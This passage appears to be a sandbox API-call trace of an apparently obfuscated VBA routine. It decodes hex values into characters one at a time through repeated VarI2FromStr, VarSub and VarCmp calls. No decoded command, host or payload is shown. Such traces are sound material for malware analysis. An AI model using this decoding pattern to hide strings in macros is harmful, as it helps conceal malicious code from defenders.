lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.235] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.235] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.235] malloc (_Size=0xa0) returned 0x11f50080 [0175.235] free (_Block=0x11f50080) [0175.235] VarI2FromStr (in: strIn="&Hb2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.235] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.235] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.235] malloc (_Size=0xa0) returned 0x11f50080 [0175.235] free (_Block=0x11f50080) [0175.235] VarI2FromStr (in: strIn="&Haf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.235] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.236] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.236] malloc (_Size=0xa0) returned 0x11f50080 [0175.236] free (_Block=0x11f50080) [0175.236] VarI2FromStr (in: strIn="&H9b", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.236] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.236] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.236] malloc (_Size=0xa0) returned 0x11f50080 [0175.236] free (_Block=0x11f50080) [0175.236] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.236] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.236] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.236] malloc (_Size=0xa0) returned 0x11f50080 [0175.237] free (_Block=0x11f50080) [0175.237] VarI2FromStr (in: strIn="&Hab", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.237] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0175.237] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.237] malloc (_Size=0xa0) returned 0x11f50080 [0175.237] free (_Block=0x11f50080) [0175.237] VarI2FromStr (in: strIn="&Hb8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.237] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0175.237] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.237] malloc (_Size=0xa0) returned 0x11f50080 [0175.237] free (_Block=0x11f50080) [0175.237] VarI2FromStr (in: strIn="&Hc4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.238] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0175.238] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.238] malloc (_Size=0xa0) returned 0x11f50080 [0175.238] free (_Block=0x11f50080) [0175.238] VarI2FromStr (in: strIn="&H90", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.238] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.238] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.238] malloc (_Size=0xa0) returned 0x11f50080 [0175.238] free (_Block=0x11f50080) [0175.238] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.238] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.239] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.239] malloc (_Size=0xa0) returned 0x11f50080 [0175.239] free (_Block=0x11f50080) [0175.239] VarI2FromStr (in: strIn="&Hb2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.239] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0175.239] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.239] malloc (_Size=0xa0) returned 0x11f50080 [0175.239] free (_Block=0x11f50080) [0175.239] VarI2FromStr (in: strIn="&Hdc", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.239] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0175.239] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.239] malloc (_Size=0xa0) returned 0x11f50080 [0175.240] free (_Block=0x11f50080) [0175.240] VarI2FromStr (in: strIn="&H90", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.240] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="B") returned 1 [0175.240] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.240] malloc (_Size=0xa0) returned 0x11f50080 [0175.240] free (_Block=0x11f50080) [0175.240] VarI2FromStr (in: strIn="&Hb3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.240] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="B") returned 1 [0175.240] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.240] malloc (_Size=0xa0) returned 0x11f50080 [0175.240] free (_Block=0x11f50080) [0175.240] VarI2FromStr (in: strIn="&Hd5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.241] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0175.241] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.241] malloc (_Size=0xa0) returned 0x11f50080 [0175.241] free (_Block=0x11f50080) [0175.241] VarI2FromStr (in: strIn="&H9c", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.241] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="B") returned 1 [0175.241] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.241] malloc (_Size=0xa0) returned 0x11f50080 [0175.241] free (_Block=0x11f50080) [0175.241] VarI2FromStr (in: strIn="&Hba", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.241] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0175.241] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.242] malloc (_Size=0xa0) returned 0x11f50080 [0175.242] free (_Block=0x11f50080) [0175.242] VarI2FromStr (in: strIn="&H9a", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.242] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0175.242] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.242] malloc (_Size=0xa0) returned 0x11f50080 [0175.242] free (_Block=0x11f50080) [0175.242] VarI2FromStr (in: strIn="&Hcc", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.242] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0175.242] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.242] malloc (_Size=0xa0) returned 0x11f50080 [0175.242] free (_Block=0x11f50080) [0175.243] VarI2FromStr (in: strIn="&He3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.243] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0175.243] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.243] malloc (_Size=0xa0) returned 0x11f50080 [0175.243] free (_Block=0x11f50080) [0175.243] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.243] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0175.243] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.243] malloc (_Size=0xa0) returned 0x11f50080 [0175.243] free (_Block=0x11f50080) [0175.243] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.243] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.244] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.244] malloc (_Size=0xa0) returned 0x11f50080 [0175.244] free (_Block=0x11f50080) [0175.244] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.244] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.244] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.244] malloc (_Size=0xa0) returned 0x11f50080 [0175.244] free (_Block=0x11f50080) [0175.244] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.244] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.244] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.244] malloc (_Size=0xa0) returned 0x11f50080 [0175.245] free (_Block=0x11f50080) [0175.245] VarI2FromStr (in: strIn="&H8f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.245] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.245] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.245] malloc (_Size=0xa0) returned 0x11f50080 [0175.245] free (_Block=0x11f50080) [0175.245] VarI2FromStr (in: strIn="&Hb2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.245] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.245] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.245] malloc (_Size=0xa0) returned 0x11f50080 [0175.245] free (_Block=0x11f50080) [0175.245] VarI2FromStr (in: strIn="&Haf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.245] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.246] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.246] malloc (_Size=0xa0) returned 0x11f50080 [0175.248] free (_Block=0x11f50080) [0175.248] VarI2FromStr (in: strIn="&H9b", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.248] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.249] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.249] malloc (_Size=0xa0) returned 0x11f50080 [0175.249] free (_Block=0x11f50080) [0175.249] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, 